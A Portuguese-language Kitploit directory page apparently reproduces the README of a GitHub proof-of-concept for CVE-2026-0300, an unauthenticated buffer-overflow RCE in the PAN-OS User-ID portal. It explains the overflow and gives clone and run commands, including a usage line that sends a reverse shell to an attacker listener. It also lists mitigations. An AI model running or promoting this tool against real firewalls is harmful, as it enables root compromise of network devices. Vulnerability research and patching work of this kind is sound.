Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

Prova de conceito para CVE-2026-0300, um estouro de buffer crítico no Portal User-ID do PAN-OS que permite execução remota de código não autenticada com privilégios de root.

Ver Repositório
21105há 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2026-0300: Análise de RCE no Portal User-ID™ do PAN-OS

Prova de Conceito de Pesquisa: CWE-787 Gravação Fora dos Limites

Security Python License Dependencies

📌 Visão Geral

CVE-2026-0300 é uma vulnerabilidade de estouro de buffer de alta gravidade identificada no Portal de Autenticação User-ID™ (Portal Cativo) do Palo Alto Networks PAN-OS. Este repositório de pesquisa demonstra a lógica técnica da vulnerabilidade, focando especificamente em como um pacote de rede não autenticado pode levar à Execução Remota de Código (RCE) com privilégios de root.


📊 Detalhamento da Vulnerabilidade

RecursoDetalhes
ID CVECVE-2026-0300
Pontuação de Gravidade9.3 (Crítico)
Tipo de FraquezaCWE-787: Gravação Fora dos Limites
Vetor de AtaqueRede (Não autenticado)
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
Software AfetadoPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 Mecanismo Técnico

A vulnerabilidade ocorre quando o serviço do Portal de Autenticação User-ID falha ao validar o comprimento dos dados recebidos antes de gravá-los em um buffer de memória.

  1. O Buffer: O serviço aloca uma área de memória de tamanho fixo para processar solicitações do portal.
  2. O Estouro: Uma solicitação POST especialmente criada envia um payload que excede esse tamanho.
  3. A Sobrescrita: Os dados excedentes sobrescrevem a pilha/heap, permitindo que o atacante controle o Ponteiro de Instrução (EIP/RIP) e execute shellcode arbitrário.

🛠️ Instalação e Configuração

1. Pré-requisitos

  • Python 3.9 ou superior.
  • Nenhuma biblioteca externa necessária (Usa os módulos padrão socket, struct e argparse).

2. Clonando a Ferramenta de Pesquisa

Clone o repositório

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

Navegue até a pasta

root@kitploit:~
cd CVE-2026-0300-POC

Torne o script executável

root@kitploit:~
chmod +x research_poc.py

🚀 Guia de Uso

Esta ferramenta foi projetada com uma CLI (Interface de Linha de Comando) profissional.

Comando Básico

root@kitploit:~
python3 research_poc.py -t <IP_ALVO> --lhost <IP_OUVINTE> -L <PORTA_OUVINTE>

Parâmetros Avançados

FlagNomeDescriçãoPadrão
-t--target(Obrigatório) Endereço IP de destino do firewall.N/A
-p--portA porta que executa o Portal User-ID.6082
-o--offsetO comprimento em bytes para atingir o ponto de estouro de memória.2048
-r--retO endereço de retorno hexadecimal.0xdeadbeef
-l--lhostendereço IP do shell reversoSeu IP
-L--lportSua Porta de Escuta4444

🛡️ Mitigação e Segurança

  • Atualize o PAN-OS: Instale os patches de segurança mais recentes (Lançados em maio de 2026).
  • Restrição de IP: Restrinja o acesso ao portal a zonas IP internas confiáveis.
  • Desative o Portal: Se a Autenticação User-ID não for necessária, desative o recurso.

⚠️ Aviso Ético e Legal

SOMENTE PARA FINS EDUCACIONAIS E PESQUISA AUTORIZADA. Testes não autorizados contra sistemas que você não possui são ilegais. O autor não é responsável por qualquer uso indevido deste código de pesquisa. Use com responsabilidade para melhorar a segurança global. Desenvolvido por: https://t.me/p3Nt3st3rsTAr Data da Descoberta da Vulnerabilidade: 07 de maio de 2026

Baixar ferramenta